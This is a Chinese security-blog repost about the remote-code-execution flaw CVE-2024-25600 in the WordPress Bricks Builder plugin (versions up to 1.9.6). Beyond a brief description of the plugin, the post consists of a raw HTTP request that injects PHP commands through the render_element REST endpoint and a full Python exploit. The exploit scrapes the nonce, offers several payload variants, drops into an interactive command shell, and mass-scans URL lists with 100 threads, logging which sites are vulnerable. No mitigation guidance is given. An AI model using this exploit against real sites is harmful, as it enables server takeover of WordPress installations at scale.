WordPress Bricks Builder RCE

admin 2024年3月7日08:01:35评论24 views字数 6926阅读23分5秒阅读模式
Bricks Builder是一款面向WordPress网站建设的可视化编辑器,使用简单、功能强大。它提供了多种布局和预设模板,可以帮助用户快速创建专业、美观的网站。Bricks Builder 小于等于1.9.6的版本存在远程代码执行漏洞,攻击者可以通过该漏洞远程执行任意代码,控制服务器。

Bricks Builder <= 1.9.6




1、获取网站nonce值(网站nonce值是一个用于WordPress站点安全性的一次性令牌。"Nonce"代表"Number used Once",即一次性数字。在WordPress中,nonce值通常用于确保表单提交的安全性,以防止跨站请求伪造(CSRF)攻击。每个nonce值只能在特定的操作和时间段内使用,一旦使用过后就会失效。)

WordPress Bricks Builder RCE


POST /wp-json/bricks/v1/render_element HTTP/1.1Host:Content-Type: application/json{  "postId": "1",  "nonce": "a2e7b6cb5e",  "element": {    "name": "container",      "settings": {        "hasLoop": "true",        "query": {          "useQueryEditor": true,          "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",          "objectType": "post"           }        }     }}

WordPress Bricks Builder RCE

import reimport warningsimport argparseimport requests

from rich.console import Consolefrom alive_progress import alive_barfrom prompt_toolkit import PromptSession, HTMLfrom prompt_toolkit.history import InMemoryHistoryfrom bs4 import BeautifulSoup, MarkupResemblesLocatorWarningfrom concurrent.futures import ThreadPoolExecutor, as_completed

warnings.filterwarnings("ignore", category=MarkupResemblesLocatorWarning, module="bs4")warnings.filterwarnings(    "ignore", category=requests.packages.urllib3.exceptions.InsecureRequestWarning)

class Code:    def __init__(self, url, payload_type, only_rce=False, verbose=True, pretty=False):        self.url = url        self.pretty = pretty        self.verbose = verbose        self.console = Console()        self.only_rce = only_rce        self.nonce = self.fetch_nonce()        self.payload_type = payload_type

    def fetch_nonce(self):        try:            response = requests.get(self.url, verify=False, timeout=20)            response.raise_for_status()            soup = BeautifulSoup(response.text, "html.parser")            script_tag = soup.find("script", id="bricks-scripts-js-extra")            if script_tag:                match = re.search(r'"nonce":"([a-f0-9]+)"', script_tag.string)                if match:                    return match.group(1)        except Exception:            pass

    def send_request(self, postId="1", command="whoami"):        headers = {"Content-Type": "application/json"}        payload_command = f'throw new Exception(`{command}` . "END");'

        base_element = {            "postId": postId,            "nonce": self.nonce,        }

        query_settings = {            "useQueryEditor": True,            "queryEditor": payload_command,        }

        payload_templates = {            "carousel": {                **base_element,                "element": {                    "name": "carousel",                    "settings": {"type": "posts", "query": query_settings},                },            },            "container": {                **base_element,                "element": {                    "name": "container",                    "settings": {"hasLoop": "true", "query": query_settings},                },            },            "generic": {                **base_element,                "element": "1",                "loopElement": {                    "settings": {"query": query_settings},                },            },            "code": {                **base_element,                "element": {                    "name": "code",                    "settings": {                        "executeCode": "true",                        "code": f"<?php {payload_command} ?>",                    },                },            },        }

        json_data = payload_templates.get(self.payload_type)        if self.pretty:            endpoint = f"{self.url}/wp-json/bricks/v1/render_element"        else:            endpoint = f"{self.url}/?rest_route=/bricks/v1/render_element"

        req = requests.post(            endpoint,            headers=headers,            json=json_data,            verify=False,            timeout=20,        )        return req

    def process_response(self, response):        if response and response.status_code == 200:            try:                json_response = response.json()                html_content = json_response.get("data", {}).get("html", None)            except ValueError:                html_content = response.text

            if html_content:                match = re.search(r"Exception: (.*?)END", html_content, re.DOTALL)                if match:                    extracted_text = match.group(1).strip()                    if extracted_text == "":                        return True, html_content, False                    else:                        return True, extracted_text, True                else:                    return True, html_content, False        return False, None, False

    def interactive_shell(self):        session = PromptSession(history=InMemoryHistory())        self.custom_print("Shell is ready, please type your commands UwU", "!")

        while True:            try:                cmd = session.prompt(HTML("<ansired><b># </b></ansired>"))                match cmd.lower():                    case "exit":                        break                    case "clear":                        self.console.clear()                    case _:                        response = self.send_request(command=cmd)                        (                            is_vuln,                            response_content,                            regex_success,                        ) = self.process_response(response)                        if is_vuln and regex_success:                            print(response_content, "n")                        else:                            self.custom_print(                                "No valid response received or target not vulnerable.",                                "-",                            )

            except KeyboardInterrupt:                break

    def check_vulnerability(self):        try:            response = self.send_request()            is_vuln, content, regex_success = self.process_response(response)

            if is_vuln:                if regex_success:                    self.custom_print(                        f"{self.url} is vulnerable to CVE-2024-25600. Command output: {content}",                        "+",                    )                else:                    self.custom_print(                        f"{self.url} is vulnerable to CVE-2024-25600 with successful auth bypass, but RCE was not achieved.",                        "!",                    ) if not self.only_rce else None                return True, content, regex_success            else:                self.custom_print(                    f"{self.url} is not vulnerable to CVE-2024-25600.", "-"                ) if self.verbose else None                return False, None, False        except Exception as e:            self.custom_print(                f"Error checking vulnerability: {e}", "-"            ) if self.verbose else None            return False, None, False

    def custom_print(self, message: str, header: str) -> None:        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}        self.console.print(            f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"        )

def scan_url(url, payload_type, output_file=None, only_rce=False, pretty=False):    code_instance = Code(        url, payload_type=payload_type, only_rce=only_rce, verbose=False, pretty=pretty    )    if code_instance.nonce:        is_vuln, html_content, is_rce_success = code_instance.check_vulnerability()        if is_vuln and (not only_rce or is_rce_success):            if output_file:                with open(output_file, "a") as file:                    file.write(f"{url}n")            return True    return False

def main():    parser = argparse.ArgumentParser(        description="Check for CVE-2024-25600 vulnerability"    )    parser.add_argument(        "--url", "-u", help="URL to fetch nonce from and check vulnerability"    )    parser.add_argument(        "--list",        "-l",        help="Path to a file containing a list of URLs to check for vulnerability",        default=None,    )    parser.add_argument(        "--output",        "-o",        help="File to write vulnerable URLs to",        default=None,    )

    parser.add_argument(        "--payload-type",        "-p",        choices=["carousel", "container", "generic", "code"],        default="code",        help="Type of payload to send (generic, code, carousel or container)",    )    parser.add_argument(        "--only-rce",        action="store_true",        help="Only display and record URLs where RCE is confirmed",    )    parser.add_argument(        "--pretty",        action="store_true",        help="Use pretty URLs (e.g., /wp-json/...) for requests",    )

    args = parser.parse_args()

    if args.list:        urls = []        with open(args.list, "r") as file:            urls = [line.strip() for line in file.readlines()]

        with alive_bar(len(urls), enrich_print=False) as bar:            with ThreadPoolExecutor(max_workers=100) as executor:                future_to_url = {                    executor.submit(                        scan_url,                        url,                        args.payload_type,                        args.output,                        args.only_rce,                        args.pretty,                    ): url                    for url in urls                }                for future in as_completed(future_to_url):                    future_to_url[future]                    try:                        future.result()                    except Exception:                        pass                    finally:                        bar()

    elif args.url:        code_instance = Code(args.url, args.payload_type, pretty=args.pretty)        if code_instance.nonce:            code_instance.custom_print(f"Nonce found: {code_instance.nonce}", "*")            is_vuln, html_content, is_rce_success = code_instance.check_vulnerability()            if is_vuln and is_rce_success:                code_instance.interactive_shell()            elif is_vuln and not args.only_rce:                code_instance.custom_print(f"Debug:n{html_content}", "!")            else:                code_instance.custom_print(f"No vulnerability found.", "-")        else:            code_instance.custom_print("Nonce not found.", "-")    else:        parser.print_help()

if __name__ == "__main__":    main()


原文始发于微信公众号(巢安实验室):WordPress Bricks Builder RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
  • 本文由 发表于 2024年3月7日08:01:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress Bricks Builder RCEhttps://cn-sec.com/archives/2552246.html


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